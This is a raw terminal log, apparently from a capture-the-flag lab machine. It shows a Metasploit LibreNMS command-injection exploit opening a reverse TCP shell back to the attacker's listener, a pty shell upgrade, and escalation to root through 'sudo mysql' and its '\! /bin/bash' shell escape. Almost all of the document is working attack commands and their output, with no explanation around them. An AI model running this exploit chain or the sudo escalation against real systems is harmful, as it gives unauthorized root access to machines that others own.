msf6 exploit(linux/http/librenms_addhost_cmd_inject) > exploit
[*] Started reverse TCP double handler on 192.168.10.10:4444
[*] Successfully logged into LibreNMS. Storing credentials...
[+] Successfully added device with hostname XsGlIoWJ
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[+] Successfully deleted device with hostname XsGlIoWJ and id #2
[*] Command: echo EGjDLGUtDAekMIlA;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "EGjDLGUtDAekMIlA\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (192.168.10.10:4444 -> 192.168.10.21:44920) at 2021-03-28 17:51:16 +0900
id
uid=1001(cronus) gid=1001(cronus) groups=1001(cronus),999(librenms)
python -c 'import pty;pty.spawn("/bin/bash")'
cronus@symfonos2:/opt/librenms/html$
cronus@symfonos2:/opt/librenms/html$ sudo mysql
sudo mysql
MariaDB [(none)]> \! whoami
\! whoami
root
MariaDB [(none)]> \! /bin/bash
\! /bin/bash
root@symfonos2:/opt/librenms/html# id
id
uid=0(root) gid=0(root) groups=0(root)
Done